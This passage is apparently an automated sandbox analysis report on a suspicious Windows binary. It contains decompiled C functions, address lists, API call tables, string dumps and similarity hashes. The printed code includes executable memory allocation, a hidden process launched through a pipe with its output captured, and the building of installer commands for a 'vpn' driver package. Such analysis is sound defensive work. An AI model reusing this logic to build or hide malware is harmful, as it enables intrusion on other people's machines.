					}
				} else {
					while( *((intOrPtr*)(_t7 + 4)) == 0) {
						_t7 =  *_t7;
						if(_t7 != 0) {
							continue;
						} else {
							goto L4;
						}
						goto L8;
					}
				}
				L8:
				return _t7;
			}







                                                                                                                        0x6f33a590
                                                                                                                        0x6f33a59a
                                                                                                                        0x6f33a5ab
                                                                                                                        0x6f33a5b8
                                                                                                                        0x6f33a5c0
                                                                                                                        0x6f33a5c2
                                                                                                                        0x6f33a5c2
                                                                                                                        0x6f33a5c7
                                                                                                                        0x6f33a5ca
                                                                                                                        0x6f33a5cd
                                                                                                                        0x6f33a5d0
                                                                                                                        0x6f33a5d3
                                                                                                                        0x6f33a5d5
                                                                                                                        0x6f33a5d8
                                                                                                                        0x6f33a5db
                                                                                                                        0x6f33a5de
                                                                                                                        0x6f33a5e6
                                                                                                                        0x6f33a5ec
                                                                                                                        0x6f33a5ee
                                                                                                                        0x00000000
                                                                                                                        0x6f33a5ee
                                                                                                                        0x00000000
                                                                                                                        0x6f33a5a0
                                                                                                                        0x6f33a5a5
                                                                                                                        0x6f33a5a9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33a5a9
                                                                                                                        0x6f33a5a0
                                                                                                                        0x6f33a5f4
                                                                                                                        0x6f33a5f4

                                                                                                                        APIs
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040,?,6F33A605,6F33B5E8,?,?,00000001,?,?,?,?,?,6F331FE4), ref: 6F33A5B8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4275171209-0
                                                                                                                        • Opcode ID: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction ID: 72dd918ccd6ede2807c16e126ef80c7819221652ca170d7c072f4386f8058921
                                                                                                                        • Opcode Fuzzy Hash: 4f85f58eaa47dc8818016362bc7f2c2614a78302f728362754fe28a4d3d3eaaf
                                                                                                                        • Instruction Fuzzy Hash: C1F0C2B6F06170CFEF12CF54D944A487BE5BB1AB10B11C05AE444DF264C770E881CB84
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33BB9C, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33BB9C() {
				void* _t1;

				_t1 = malloc(0x80); // executed
				 *0x6f34096c = _t1;
				 *0x6f340968 = _t1;
				if(_t1 != 0) {
					 *_t1 =  *_t1 & 0x00000000;
					return 0;
				} else {
					return _t1 + 1;
				}
			}




                                                                                                                        0x6f33bba1
                                                                                                                        0x6f33bba8
                                                                                                                        0x6f33bbad
                                                                                                                        0x6f33bbb4
                                                                                                                        0x6f33bbb8
                                                                                                                        0x6f33bbbd
                                                                                                                        0x6f33bbb6
                                                                                                                        0x6f33bbb7
                                                                                                                        0x6f33bbb7

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: malloc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2803490479-0
                                                                                                                        • Opcode ID: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction ID: e6359331db8f602e5497fcd84ee77876ba91257e942673c0af8f0fad1d7cb4bd
                                                                                                                        • Opcode Fuzzy Hash: 5e10893ca169395ace7940331e720eb5a4847a31a4242a51ef0dd2ff94a06f21
                                                                                                                        • Instruction Fuzzy Hash: CDC012F2722A01CAEB809B29880431936E8FB46332F1094AAE800C90A8EF308054CB00
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Non-executed Functions

                                                                                                                        Function 00500C6A, Relevance: 173.3, APIs: 36, Strings: 62, Instructions: 1801COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 00500C8C
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • _strlen.LIBCMT ref: 00500CE4
                                                                                                                          • Part of subcall function 004FA79E: __EH_prolog3.LIBCMT ref: 004FA7A5
                                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA7B7
                                                                                                                          • Part of subcall function 004FA79E: _memset.LIBCMT ref: 004FA7DC
                                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA801
                                                                                                                          • Part of subcall function 004FA79E: select.WS2_32 ref: 004FA86F
                                                                                                                          • Part of subcall function 004FA79E: GetTickCount.KERNEL32 ref: 004FA886
                                                                                                                          • Part of subcall function 004FA79E: ioctlsocket.WS2_32(?,4004667F,?), ref: 004FA8A9
                                                                                                                        • _strlen.LIBCMT ref: 00500E5E
                                                                                                                        • _strlen.LIBCMT ref: 00500FE1
                                                                                                                        • _strncpy.LIBCMT ref: 00501002
                                                                                                                          • Part of subcall function 004FECF5: __time32.LIBCMT ref: 004FED0C
                                                                                                                          • Part of subcall function 004FECF5: shutdown.WS2_32(00836C40,00000001), ref: 004FED20
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CountH_prolog3Tick_strlen$CriticalSection$DeleteH_prolog3_catchInitialize__time32_memset_strncpyioctlsocketselectshutdown
                                                                                                                        • String ID: $ HTTP/1$ NC.HttpInit.Failed1$ NC.HttpInit.Failed10$ NC.HttpInit.Failed2$ NC.HttpInit.Failed3$ NC.HttpInit.Failed4$ NC.HttpInit.Failed5$ NC.HttpInit.Failed7$ NC.HttpInit.Failed8$ NC.HttpInit.Failed9$ NC.HttpInit.FastPOSTMissing$ NC.HttpInit.Header $ NC.HttpInit.ReGET$ NC.HttpInit.ReGET.Replace$ NC.HttpInit.ResendPacket $ NC.HttpInit.SendBuffered.Failed$ NC.HttpInit.WrongData$ NC.HttpInit.WrongPOSTorder Exp=$ Rec=$&data=$&id=$&p=$/JAVA/$/Java/$/java/$/selftest$000$123$<?xml version="1.0"?><cross-domain-policy><site-control permitted-cross-domain-policies="all"/><allow-http-request-headers-from domain="*" headers="*" /><allow-access-from domain="*" /></cross-domain-policy>$<html><body>This site is running <a href='http://www.TeamViewer.com'>TeamViewer</a>.</body></html>$?s=$?s=00000000$?s=00000000&m=fast$Cache-control: no-cache$Connection: Keep-alive$Connection: Keep-alive$Connection: close$Connection: close$Content-Length: $Content-Type: application/octet-stream$Content-Type: text/html$Content-Type: text/xml$Content-length:$Content-length: 0$Content-length: 10$Content-length: 17$GET $GET /crossdomain.xml $HTTP$HTTP/1.0 200 OK$HTTP/1.0 400 Bad Request$HTTP/1.1$HTTP/1.1 200 OK$HandleHttpInit.NoGetSession$HandleHttpInit.NoPostSession$NC.IP-Block GET-Init $POST $Tz$X-Connection: close$X-Lasterror: $fast
                                                                                                                        • API String ID: 2298429837-3936837734
                                                                                                                        • Opcode ID: 35be16c33e76b4bf5acb9c687b671e697c727d9958302983b0fa89060d3d00cd
                                                                                                                        • Instruction ID: 126e56028416a6afb7c9dafa6e9211db950bf1ab97138c0668dce98b9ec09594
                                                                                                                        • Opcode Fuzzy Hash: 35be16c33e76b4bf5acb9c687b671e697c727d9958302983b0fa89060d3d00cd
                                                                                                                        • Instruction Fuzzy Hash: 7EE21670D05289AADB15EBA5C956BEE7FB8AF61304F10405EF401771D2EB781F08CB6A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332ED0, Relevance: 56.2, APIs: 31, Strings: 1, Instructions: 227memoryfileprocessCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F332ED0(intOrPtr* _a12) {
				intOrPtr* _v4;
				signed int _v8;
				CHAR* _v12;
				intOrPtr _v16;
				struct _STARTUPINFOA _v84;
				struct _PROCESS_INFORMATION _v100;
				void* _v108;
				void* _v112;
				CHAR* _v116;
				void* _v120;
				void* _v124;
				void* _v128;
				intOrPtr _v132;
				long _v136;
				CHAR* _t52;
				int _t54;
				long _t69;
				intOrPtr _t82;
				long _t85;
				void* _t90;
				struct _OVERLAPPED* _t110;
				void* _t111;
				int _t112;
				int _t116;
				void* _t121;

				_t110 = 0;
				_v116 = 0;
				_t90 = 0;
				_v100.hThread.nLength = 0xc;
				_v100.dwProcessId = 0;
				_v100.dwThreadId = 1;
				_v112 = 0;
				_v108 = 0;
				if(CreatePipe( &_v112,  &_v108,  &(_v100.hThread), 0) == 0) {
					 *_a12 = 0;
					return 0;
				} else {
					_push(0x44);
					_push( &(_v84.dwX));
					L6F33C2EE();
					_t52 = _v116;
					_push(0x10);
					_push( &(_v100.dwProcessId));
					_v84.lpDesktop = 0x44;
					_v84.lpReserved2 = 0x101;
					_v12 = _t52;
					_v16 = _t52;
					L6F33C2EE();
					_t54 = CreateProcessA(0, _v12, 0, 0, 1, 0x8000000, 0, 0,  &_v84,  &_v100);
					CloseHandle(_v124);
					if(_t54 != 0) {
						_t111 = HeapAlloc(GetProcessHeap(), 8, 0x401);
						_v120 = _t111;
						if(_t111 != 0) {
							_v116 = GetTickCount() + _v8 * 0x3e8;
							_v136 = 0;
							if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
								while(1) {
									_t69 = _v136;
									if(_t69 == 0) {
										goto L23;
									}
									 *((char*)(_t69 + _t111)) = 0;
									_t116 = MultiByteToWideChar(1, 0, _t111, _v136, 0, 0);
									if(_t116 != 0) {
										_t31 = _t116 + 2; // 0x2
										_t121 = HeapAlloc(GetProcessHeap(), 8, _t116 + _t31);
										if(_t121 != 0) {
											if(MultiByteToWideChar(1, 0, _t111, _v136, _t121, _t116) != 0) {
												_t112 = WideCharToMultiByte(0xfde9, 0, _t121, _t116, 0, 0, 0, 0);
												if(_t112 != 0) {
													_t82 = _v132 + _t112;
													_v132 = _t82;
													_push(_t82 + 1);
													if(_t90 != 0) {
														_t85 = HeapReAlloc(GetProcessHeap(), 0, _t90, ??);
														if(_t85 != 0) {
															goto L12;
														} else {
															HeapFree(GetProcessHeap(), _t85, _t90);
															_t90 = 0;
															goto L14;
														}
														goto L24;
													} else {
														_t85 = HeapAlloc(GetProcessHeap(), 8, ??);
														L12:
														_t90 = _t85;
														if(_t90 != 0) {
															WideCharToMultiByte(0xfde9, 0, _t121, _t116, _t90 - _t112 + _v132, _t112, 0, 0);
														}
													}
												}
												L14:
												_t111 = _v120;
											}
											HeapFree(GetProcessHeap(), 0, _t121);
										}
									}
									if(GetTickCount() >= _v116 || _t90 == 0) {
										_push(0);
										_push(_v100.hProcess);
										L6F33C30C();
									} else {
										if(ReadFile(_v128, _t111, 0x400,  &_v136, 0) != 0) {
											continue;
										} else {
										}
									}
									goto L23;
								}
							}
							L23:
							HeapFree(GetProcessHeap(), 0, _t111);
						}
						L24:
						CloseHandle(_v100.hThread);
						CloseHandle(_v100);
						_t110 = _v132;
					}
					CloseHandle(_v128);
					 *_v4 = _t110;
					return _t90;
				}
			}




























                                                                                                                        0x6f332ed5
                                                                                                                        0x6f332ee7
                                                                                                                        0x6f332eeb
                                                                                                                        0x6f332eed
                                                                                                                        0x6f332ef5
                                                                                                                        0x6f332ef9
                                                                                                                        0x6f332f01
                                                                                                                        0x6f332f05
                                                                                                                        0x6f332f11
                                                                                                                        0x6f333173
                                                                                                                        0x6f33317c
                                                                                                                        0x6f332f17
                                                                                                                        0x6f332f19
                                                                                                                        0x6f332f1f
                                                                                                                        0x6f332f20
                                                                                                                        0x6f332f25
                                                                                                                        0x6f332f29
                                                                                                                        0x6f332f2f
                                                                                                                        0x6f332f30
                                                                                                                        0x6f332f38
                                                                                                                        0x6f332f40
                                                                                                                        0x6f332f47
                                                                                                                        0x6f332f4e
                                                                                                                        0x6f332f71
                                                                                                                        0x6f332f84
                                                                                                                        0x6f332f88
                                                                                                                        0x6f332fa2
                                                                                                                        0x6f332fa4
                                                                                                                        0x6f332faa
                                                                                                                        0x6f332fd0
                                                                                                                        0x6f332fda
                                                                                                                        0x6f332fe6
                                                                                                                        0x6f332ff0
                                                                                                                        0x6f332ff0
                                                                                                                        0x6f332ff6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333000
                                                                                                                        0x6f333014
                                                                                                                        0x6f333018
                                                                                                                        0x6f33301e
                                                                                                                        0x6f333032
                                                                                                                        0x6f333036
                                                                                                                        0x6f333050
                                                                                                                        0x6f333069
                                                                                                                        0x6f33306d
                                                                                                                        0x6f333073
                                                                                                                        0x6f333075
                                                                                                                        0x6f33307a
                                                                                                                        0x6f33307d
                                                                                                                        0x6f333101
                                                                                                                        0x6f333109
                                                                                                                        0x00000000
                                                                                                                        0x6f33310b
                                                                                                                        0x6f333114
                                                                                                                        0x6f33311a
                                                                                                                        0x00000000
                                                                                                                        0x6f33311a
                                                                                                                        0x00000000
                                                                                                                        0x6f33307f
                                                                                                                        0x6f333088
                                                                                                                        0x6f33308e
                                                                                                                        0x6f33308e
                                                                                                                        0x6f333092
                                                                                                                        0x6f3330ab
                                                                                                                        0x6f3330ab
                                                                                                                        0x6f333092
                                                                                                                        0x6f33307d
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330b1
                                                                                                                        0x6f3330bf
                                                                                                                        0x6f3330bf
                                                                                                                        0x6f333036
                                                                                                                        0x6f3330cf
                                                                                                                        0x6f333122
                                                                                                                        0x6f333124
                                                                                                                        0x6f333125
                                                                                                                        0x6f3330d5
                                                                                                                        0x6f3330ef
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3330f5
                                                                                                                        0x6f3330ef
                                                                                                                        0x00000000
                                                                                                                        0x6f3330cf
                                                                                                                        0x6f332ff0
                                                                                                                        0x6f33312a
                                                                                                                        0x6f333134
                                                                                                                        0x6f33313a
                                                                                                                        0x6f333140
                                                                                                                        0x6f333145
                                                                                                                        0x6f33314c
                                                                                                                        0x6f33314e
                                                                                                                        0x6f33314e
                                                                                                                        0x6f333157
                                                                                                                        0x6f333162
                                                                                                                        0x6f33316b
                                                                                                                        0x6f33316b

                                                                                                                        APIs
                                                                                                                        • CreatePipe.KERNEL32 ref: 6F332F09
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000044), ref: 6F332F20
                                                                                                                        • RtlZeroMemory.NTDLL ref: 6F332F4E
                                                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,08000000,00000000,00000000,?,?), ref: 6F332F71
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F332F84
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000401,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F332F95
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F332F9C
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F332FB0
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F332FDE
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F33300E
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000002,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333025
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F33302C
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,00000000,?,00000000,00000000), ref: 6F333048
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333063
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F333081
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333088
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 6F3330AB
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F3330B8
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F3330BF
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F3330C5
                                                                                                                        • ReadFile.KERNEL32(?,00000000,00000400,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6F3330E7
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?), ref: 6F3330FA
                                                                                                                        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333101
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33310D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333114
                                                                                                                        • NtTerminateProcess.NTDLL(?,00000000), ref: 6F333125
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044), ref: 6F33312D
                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333134
                                                                                                                        • CloseHandle.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333145
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F33314C
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000001,00000010,?,00000044,?), ref: 6F333157
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocByteCharCloseHandleMultiWide$Free$CountCreateFileMemoryReadTickZero$PipeTerminate
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1574224466-2746444292
                                                                                                                        • Opcode ID: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction ID: c56d1d7cf3803eb3caa04411d334526c855fb94d2ac1a9ef05d1e66a5cf51e63
                                                                                                                        • Opcode Fuzzy Hash: 3b637f1cb17450afd01af3a6585aca2d6a4881f01100fb07a57f387ddcb12d4d
                                                                                                                        • Instruction Fuzzy Hash: 65718C72A44385ABE720DFA5CC49F5BBBEDFBC9B10F00491DB645D7280DAB0E4148B22
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3344D0, Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 202memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 85%
                                                                                                                        			E6F3344D0(void* __ebx, void* __edi) {
				CHAR* _t35;
				int _t36;
				char _t40;
				void* _t42;
				int _t46;
				CHAR* _t47;
				void* _t50;
				void* _t55;
				CHAR* _t57;
				void* _t64;
				void* _t65;
				void* _t66;
				CHAR* _t67;
				CHAR* _t69;
				signed int _t70;
				signed int _t74;
				CHAR* _t78;
				void* _t79;
				CHAR* _t82;
				char _t83;
				void* _t84;
				CHAR* _t86;
				void* _t87;
				void* _t88;
				void* _t89;
				intOrPtr _t92;
				intOrPtr _t93;
				CHAR* _t94;
				void* _t96;
				void* _t98;
				void* _t99;
				void* _t100;

				_t89 = __edi;
				_t66 = __ebx;
				 *(_t98 + 0xc) = 0;
				if(M6F340544 == 0) {
					L23:
					return  *(_t98 + 0xc);
				} else {
					_t35 = M6F3404CC; // 0xa32d38
					_t69 = M6F3404D8; // 0xa55cd8
					_t82 = M6F3404DC; // 0xa55ca8
					_t36 = GetPrivateProfileIntA(_t82, _t69, 0, _t35);
					_t93 =  *((intOrPtr*)(_t98 + 0x38));
					if(_t93 != 0 || _t36 != 0) {
						if( *((intOrPtr*)(_t98 + 0x3c)) != 0) {
							goto L7;
						} else {
							_t64 = M6F3404D8; // 0xa55cd8
							_t65 = E6F3338A0(_t64, 0, 0, 1);
							_t98 = _t98 + 0x10;
							if(_t65 == (0 | _t93 == 0x00000000)) {
								goto L7;
							}
						}
						goto L23;
					} else {
						if( *((intOrPtr*)(_t98 + 0x3c)) != _t36) {
							L7:
							_t96 = HeapAlloc(GetProcessHeap(), 8, 0x800);
							if(_t96 != 0) {
								_t83 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
								_push(_t66);
								_push(_t89);
								wsprintfA(_t96, "%s%s%s", _t83, "vpn", ".cab");
								_t40 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
								_t7 = _t96 + 0x201; // 0x201
								_t67 = _t7;
								 *((intOrPtr*)(_t98 + 0x50)) = wsprintfA(_t67, "%s%s%c", _t40, "vpn", 0x5c);
								_t42 = E6F332DC0(_t96, _t67, 0);
								_t98 = _t98 + 0x34;
								if(_t42 != 0) {
									_t70 = M6F3404EC; // 0x1
									asm("sbb ecx, ecx");
									wsprintfA(_t96, "%s%d%c", _t67, ( ~_t70 & 0xffffffea) + 0x56, 0x5c);
									_t9 =  &(_t67[0x401]); // 0x602
									_t94 = _t9;
									_t46 = wsprintfA(_t94, "%s%s%s", _t96, "install", ".exe");
									_t99 = _t98 + 0x28;
									_t47 =  &(( &(_t94[1]))[_t46]);
									 *(_t99 + 0x10) = _t47;
									if( *((intOrPtr*)(_t99 + 0x44)) == 0) {
										_t84 = M6F3404D8; // 0xa55cd8
										wsprintfA(_t47, "%s %s", "remove", _t84);
										_t100 = _t99 + 0x10;
									} else {
										_t79 = M6F3404D8; // 0xa55cd8
										wsprintfA(_t47, "%s \"%s%s%s\" %s", "install", _t96, _t79, ".inf", _t79);
										_t100 = _t99 + 0x1c;
									}
									_t74 =  *(_t100 + 0x10);
									_push(_t100 + 0x14);
									_push(0x1e);
									_push(0);
									 *(_t100 + 0x2c) = 0;
									_t50 = E6F334230(0, _t94, _t74);
									_t98 = _t100 + 0x18;
									if(_t50 != 0) {
										if(E6F334300() != 0) {
											_t88 = M6F3404D8; // 0xa55cd8
											wsprintfA( *(_t98 + 0x10), "%s %s", "restart", _t88);
											_t74 =  *(_t98 + 0x20);
											_push(0);
											_push(0x1e);
											_push(0);
											E6F334230(0, _t94, _t74);
											_t98 = _t98 + 0x28;
										}
										_t92 =  *((intOrPtr*)(_t98 + 0x44));
										if(_t92 == 0) {
											_t55 = M6F3404D8; // 0xa55cd8
											E6F333700(_t55, 1);
											_t98 = _t98 + 8;
										} else {
											_t87 = M6F3404D8; // 0xa55cd8
											E6F3338A0(_t87, 0, 0, 0);
											_t98 = _t98 + 0x10;
										}
										if( *((intOrPtr*)(_t98 + 0x14)) == 0) {
											 *_t94 = (_t74 & 0xffffff00 | _t92 != 0x00000000) + 0x30;
											_t94[1] = 0;
											_t86 = M6F3404CC; // 0xa32d38
											_t57 = M6F3404D8; // 0xa55cd8
											_t78 = M6F3404DC; // 0xa55ca8
											WritePrivateProfileStringA(_t78, _t57, _t94, _t86);
